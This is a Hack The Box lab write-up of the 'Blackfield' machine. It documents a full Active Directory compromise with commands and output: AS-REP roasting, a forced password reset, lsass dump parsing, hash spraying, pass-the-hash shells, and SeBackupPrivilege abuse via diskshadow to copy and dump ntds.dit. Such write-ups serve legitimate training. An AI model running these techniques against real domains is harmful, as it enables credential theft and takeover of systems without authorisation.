---
title: "HTB: Blackfield"
date: 2021-07-15
classes: wide
categories:
  - Hackthebox
tag:
  - Active Directory 
  - SMB
  - bloodhound-python
  - lsass
  - as-rep roasting
  - SeBackupPrivilege
  - password spraying 
  - ntds.dit
toc: true
---

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/blackfield/blackfield.png" alt="">

# Summary

Blackfield was a fun machine that first involved performing an as-rep roast on a user that has kerberos pre-authentication set. WIth this user I then use bloodhound-python to see that this user has permissions to change the password of the audit2020 user. With this user he has permissions to access a share on the smb server that has an lsass dump. I then use pypykatz to dump the hashes of this file and then do password spraying with these hashes and manage to get access as svc_backup. WIth this access I then see that svc_backup has an SeBackupPrivilege which is exploitable because it allows me to read all files on the machine. However I can't just get the contents of root.txt because its encrypted with efs. I can't copy ntds.dit from the c drive (whcih is the file that houses all the password hashes for the users) because that file is in use. Therefore I need to know to use diskshadow to copy the c drive and copy the ntds.dit file that way which will allow me to dump the password hash for the administrator account and do a passthehash to escalate my privileges to administrator. So with that let's jump into this machine 

# Recon

```
$cat nmap/initial.txt 
# Nmap 7.91 scan initiated Fri Jun  4 07:58:05 2021 as: nmap -A -oN nmap/initial.txt -vvv -Pn 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up, received user-set (0.018s latency).
Scanned at 2021-06-04 07:58:05 BST for 55s
Not shown: 994 filtered ports
Reason: 994 no-responses
PORT    STATE SERVICE       REASON  VERSION
53/tcp  open  domain        syn-ack Simple DNS Plus
88/tcp  open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2021-06-04 14:58:15Z)
135/tcp open  msrpc         syn-ack Microsoft Windows RPC
389/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open  microsoft-ds? syn-ack
593/tcp open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h59m56s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 48702/tcp): CLEAN (Timeout)
|   Check 2 (port 39879/tcp): CLEAN (Timeout)
|   Check 3 (port 39304/udp): CLEAN (Timeout)
|   Check 4 (port 53637/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-06-04T14:58:19
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun  4 07:59:00 2021 -- 1 IP address (1 host up) scanned in 54.91 seconds
```

And all port scan 

```
$cat nmap/all-ports 
# Nmap 7.91 scan initiated Wed Jul 14 14:09:44 2021 as: nmap -oN nmap/all-ports -p- --min-rate 1000 -Pn 10.10.10.192
Nmap scan report for blackfield.local (10.10.10.192)
Host is up (0.019s latency).
Not shown: 65527 filtered ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
389/tcp  open  ldap
445/tcp  open  microsoft-ds
593/tcp  open  http-rpc-epmap
3268/tcp open  globalcatLDAP
5985/tcp open  wsman

# Nmap done at Wed Jul 14 14:11:25 2021 -- 1 IP address (1 host up) scanned in 100.88 seconds
```


# Enumeration of Services

## DNS 53

```
$nslookup
> server 10.10.10.192
Default server: 10.10.10.192
Address: 10.10.10.192#53
> 10.10.10.192
** server can't find 192.10.10.10.in-addr.arpa: SERVFAIL
> blackfield.local
Server:         10.10.10.192
Address:        10.10.10.192#53

Name:   blackfield.local
Address: 10.10.10.192
Name:   blackfield.local
Address: dead:beef::451f:4d7f:478e:df44
Name:   blackfield.local
Address: dead:beef::491d:6d83:d46c:647f
> 127.0.0.1
1.0.0.127.in-addr.arpa  name = localhost.
> 127.0.0.2
** server can't find 2.0.0.127.in-addr.arpa: NXDOMAIN
```

and then I attempted a dns zone transfer but that failed

```
$dig axfr blackfield.local @10.10.10.192

; <<>> DiG 9.16.15-Debian <<>> axfr blackfield.local @10.10.10.192
;; global options: +cmd
; Transfer failed.
```

## LDAP 389 

ldap didn't give anything of use

```
$ldapsearch -h $ip -x -b "DC=blackfield,DC=local" 
# extended LDIF
#
# LDAPv3
# base <DC=blackfield,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A69, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
```


## RPC 135
Null authentication was allowed but I couldn't get any useful information from rpc.

```
$rpcclient -U '' -N $ip
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
```

## SMB 445

```
$smbclient -L //$ip/
Enter WORKGROUP\purplerabbit's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        profiles$       Disk      
        SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available
┌─[purplerabbit@kali]─[~/Documents/htb/ad/blackfield]
└──╼ $smbmap -H $ip -u purplerabbit
[+] Guest session       IP: 10.10.10.192:445    Name: blackfield.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
```


the profiles$ share just had a long list of profiles, I will copy this long list of users and use it to create a file with the just the profiles of the machine

```
$head users.txt 
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
ACsonaki
AHigchens
AJaquemai
```

# Support

With these usernames I will see if any of them have kerberos pre authentication enabled. 

```
$GetNPUsers.py blackfield.local/ -usersfile users.txt -format hashcat -output hashes.asreproast -dc-ip $ip
```

Most of the users didn't exist in the kerberos database, but there were two that did 
audit2020 and svc_backup and also support which gave a hash

```
$cat hashes.asreproast 
$krb5asrep$23$support@BLACKFIELD.LOCAL:3f0c89eaa1f25cba5fd983837bb3a2b5$86ec7145584bfe5dc058d1f6212362bfa731a9b4337b6bfe3c398451e8eeb0ccc1492cad762565c2b3bfc9dc5288b81db7c53e68ec6fc4d3aa8e9ede14bd7d6af45e871461cafa27e61d4194acdcebfb770a58d7d1fe38f0a490f21deb617b6acbbd43e70dad36640e7f16d791d7103e5090008b46f2838b0a5c64f95c29ae16014cdbc41b5d7e619d945a81fb5f807ddff22119091f0b06e2bcb2a70497d5ef80cbb21c9dc8aa9b25082caf2d595c923b7be7dcbaea9f4ebf579aa7bbeb0b36b50d4cf63fd5ef2b745cff0a02c6c5d708335ff630767ccba8202298daa44d083a3dfae0ff79d1b2cfd090c130d7d988baa10904
```

Next I cracked this hash using hashcat doing the command 

```
```

Which then gave the password of "#00^BlackKnight"

```
$krb5asrep$23$support@BLACKFIELD.LOCAL:3f0c89eaa1f25cba5fd983837bb3a2b5$86ec7145584bfe5dc058d1f6212362bfa731a9b4337b6bfe3c398451e8eeb0ccc1492cad762565c2b3bfc9dc5288b81db7c53e68ec6fc4d3aa8e9ede14bd7d6af45e871461cafa27e61d4194acdcebfb770a58d7d1fe38f0a490f21deb617b6acbbd43e70dad36640e7f16d791d7103e5090008b46f2838b0a5c64f95c29ae16014cdbc41b5d7e619d945a81fb5f807ddff22119091f0b06e2bcb2a70497d5ef80cbb21c9dc8aa9b25082caf2d595c923b7be7dcbaea9f4ebf579aa7bbeb0b36b50d4cf63fd5ef2b745cff0a02c6c5d708335ff630767ccba8202298daa44d083a3dfae0ff79d1b2cfd090c130d7d988baa10904:#00^BlackKnight
```

Trying to get a winrm shell didn't work suggesting that this user isn't part of the remote management groups on this machine. 

Looking at their permissions in SMB showed that they had permission to read the NETLOGON share

```
$smbmap -H $ip -u support -p "#00^BlackKnight"
[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                NO ACCESS       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
```

Looking at the SYSVOL share showed that there was a file that was encrypted with EFS (encrypting file system) but looking online it seemed that there wasn't anything I could really do with this file.

I then turned to kerberoasting, but that was a dead end. 

Next I tried ldap and managed to get a list of users on the machine which I then attempted to see if any of these users had the same password as the support user, but none did. 

```
$/opt/windapsearch-linux-amd64 -u support -p "#00^BlackKnight" -d blackfield.local -m users $ip | grep userPrincipalName | awk -F: {'print $2'} | awk '{$1=$1;print}' | cut -f1 -d"@" > names.txt
┌─[purplerabbit@kali]─[~/Documents/htb/ad/blackfield]
└──╼ $head names.txt 
BLACKFIELD764430
BLACKFIELD538365
BLACKFIELD553715
BLACKFIELD840481
BLACKFIELD189208
BLACKFIELD404458
BLACKFIELD706381
BLACKFIELD937395
BLACKFIELD622501
BLACKFIELD600999
```

Looking at rpc I didn't get anything useful in the description fields 

```
──╼ $rpcclient -U support $ip                                                                                                                                                                
Enter WORKGROUP\support's password:                                                                                                                                                           
rpcclient $> querydispinfo                                                                                                                                                                    
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0xfb0 RID: 0x44f acb: 0x00000210 Account: audit2020      Name: (null)    Desc: (null)                                                                                                  
index: 0x10a7 RID: 0x546 acb: 0x00020010 Account: BLACKFIELD103974      Name: Josefvon Moorehendrickson Desc: (null)           
index: 0x103f RID: 0x4de acb: 0x00020010 Account: BLACKFIELD106360      Name: Grozdan Gomane    Desc: (null)                   
index: 0x104d RID: 0x4ec acb: 0x00020010 Account: BLACKFIELD107197      Name: Phouvieng Tesik   Desc: (null)                   
index: 0x10a9 RID: 0x548 acb: 0x00020010 Account: BLACKFIELD112766      Name: Jeaninne Sebaali  Desc: (null)                   
index: 0xffc RID: 0x49b acb: 0x00020010 Account: BLACKFIELD114762       Name: Oleguer Hardybala Desc: (null)
--snipped---
```

# Support => audit2020

This next bit was a little bit difficult as you needed to know to use the bloodhound-python tool which I didn't really know to do.

To download bloodhound run 

```
$sudo apt-get install bloodhound
$pip3 install bloodhound
```

Then to use the bloodhound-python tool on blackfield its 

```
$bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly
```

Next it will output a few json files which need to be imported into bloodhound

```
$ls
computers.json  domains.json  groups.json  users.json
```

After the data is imported I then search for the support user and right click and mark as owned. 

Next I click on support user node info and scroll down to "first degree object control" and see that support has permisisons to change the password of the audit2020 account

<img src="{{ site.url }}{{ site.baseurl }}/assets/posts/2021/blackfield/1.png" alt="">

Following along from this article <https://malicious.link/post/2017/reset-ad-user-password-with-linux/> I connect via rpc and run the command

```
$rpcclient -U support $ip

setuserinfo2 audit2020 23 'ASDqwe123'
```

Next I attempt to connect to winrm using the password I just set and manage to get in as audit2020 but it fails meaning that audit2020 isn't apart of the remote management groups

Next I enumerated the smb shares that audit2020 has and he has read access the forensics share

```
$smbmap -H $ip -u audit2020 -p ASDqwe123 
[+] IP: 10.10.10.192:445        Name: blackfield.local                                  
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        forensic                                                READ ONLY       Forensic / Audit share.
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        profiles$                                               READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
```

# audit2020 => svc_backup

Looking into the forensics share with smbclient showed that were a bunch of files that I auto downloaded using mget *

```
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
```

I see an lsass memory dump 

```
[purplerabbit@kali]─[~/Documents/htb/ad/blackfield/forensics/memory_analysis]
└──╼ $ls
conhost.zip  dllhost.zip  lsass.zip          ServerManager.zip  svchost.zip    wlms.zip
ctfmon.zip   ismserv.zip  mmc.zip            sihost.zip         taskhostw.zip  WmiPrvSE.zip
dfsrs.zip    lsass.DMP    RuntimeBroker.zip  smartscreen.zip    winlogon.zip
```

which is an important file because it stores password hashes; from the wikiepdia page "Local Security Authority Subsystem Service (**LSASS**) is a process in Microsoft Windows operating systems that is responsible for enforcing the security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens." 

We can use pypykatz <https://github.com/skelsec/pypykatz> to dump the hashes inside this file and then with each user do password spraying using the hashes as the password (pass the hash)

To install pypykatz 

```
$pip3 install pypykatz
```
Then we can dump the hashes inside this lsass file with the command

```
pypykatz lsa minidump lsass.DMP
```

which gives a few password hashes for different users 

``` 
--snipped--
                Username: svc_backup                                                                                   
                Domain: BLACKFIELD                                                                                                                                                                                                            
                LM: NA                                                                                                 
                NT: 9658d1d1dcd9250115e2205d9f48400d                                                                   
                SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c 
--snipped--

 Username: DC01$
                Domain: BLACKFIELD
                LM: NA
                NT: b624dc83a27cc29da11d9bf25efea796
                SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
--snipped--

           Username: Administrator
                Domain: BLACKFIELD
                LM: NA
                NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
                SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
--snipepd--

```

WIth the NT hashes I created a file hashes.txt to perform password spraying on the users.txt file I had already created. Then used crackmapexec to perform the password spraying on the domain controller and ran crackmapexec with the following arguments:

```
$crackmapexec smb $ip -u users.txt -H hashes.txt
```

WIth this command I managed to get access to an smb share as svc_backup

```
SMB         10.10.10.192    445    DC01             [+] BLACKFIELD.local\svc_backup 9658d1d1dcd9250115e2205d9f48400d
```

(the plus meaning it was successful)

Next I tried to access the remote computer through winrm and managed to get a shell into the system.

```
$evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i $ip

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc_backup\Documents> whoami
blackfield\svc_backup
```

# svc_backup => Administrator

I noticed that I had SeBackupPrivilege meaning I should be able to read all files on the machine

```
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```

Next I tried to view root.txt but I got permission denied 

```
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc_backup\Documents> type //dc01/c$/users/administrator/desktop/root.txt
Access to the path '\\dc01\c$\users\administrator\desktop\root.txt' is denied.
At line:1 char:1
+ type //dc01/c$/users/administrator/desktop/root.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (\\dc01\c$\users...esktop\root.txt:String) [Get-Content], UnauthorizedAccessException
    + FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand
[0;31m*Evil-WinRM*[0m[0;1;33m PS [0mC:\Users\svc_backup\Documents> "

```

Looking at the c drive showed there was a note.txt that read 

```
type //dc01/c$/notes.txt
Mates,

After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.

We will probably have to backup & restore things later.
- Mike.

PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
```

meaning that I can't read root.txt because its encrypted 

So I need to use a different way to priv esc. I hav read access to all files on the c drive because I have the SeBackupPrivilege

Following the guidance from this video <https://www.youtube.com/watch?v=pWkWIa2dfHY>

I downloaded and transferred over a copy of the following dlls found here <https://github.com/giuliano108/SeBackupPrivilege> and then imported the modules using 

```
Import-Module .\SeBackupPrivilegeCmdLets.dll
Import-Module .\SeBackupPrivilegeUtils.dll
```

Next I created a copy.txt file which quite simply copies the c drive and places it in an x drive "x:" The reason I need to do this is because I can't get access to the ntds.dit file because its being used. Therefore I need to copy it so that I can be able to read it.

```
$cat copy.txt 
set context persistent nowriters
set metadata c:\temp\metadata.cab
set verbose on
add volume c: alias privesccopy
create 
expose %privesccopy% x:
```

Then I use diskshadow 

```
diskshadow /s copy.txt
```

The ntds file is a file that contains information about all the active directory objects (most important for us is that its where it stores the NT hashes for the users on the machine)

```
Copy-FileSeBackupPrivilege X:\windows\ntds\ntds.dit C:\temp\ntds.dit
```

Then get a copy of the system file which is needed to decyrpt the ntds.dit file

```
C:\temp> reg save hklm\system c:\temp\system.back
The operation completed successfully.                                                                                  
                                       
```

I then download these files using evil-winrm's download module and then use impacket's secretsdump.py to extract the password hashes from ntds.dit

```
$secretsdump.py -ntds ntds.dit -system system.back local                                                                                                                                                                                 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation                                                                                                                                                                                      
                                                                                                                                                                                                                                              
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393                                                                                                                                                                                 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)                                                                                                                                                                                 
[*] Searching for pekList, be patient                                                                                                                                                                                                         
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c                                                                                                                                                                             
[*] Reading and decrypting hashes from ntds.dit                                                                                                                                                                                               
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
--snipped--
```


With this NT hash I was able to get a shell as administrator 

```
$evil-winrm -i $ip -u administrator -H 184fb5e5178480be64824d4cd53b99ee
C:\Users\Administrator\desktop> whoami
blackfield\administrator
```

That was blackfield from hackthebox! 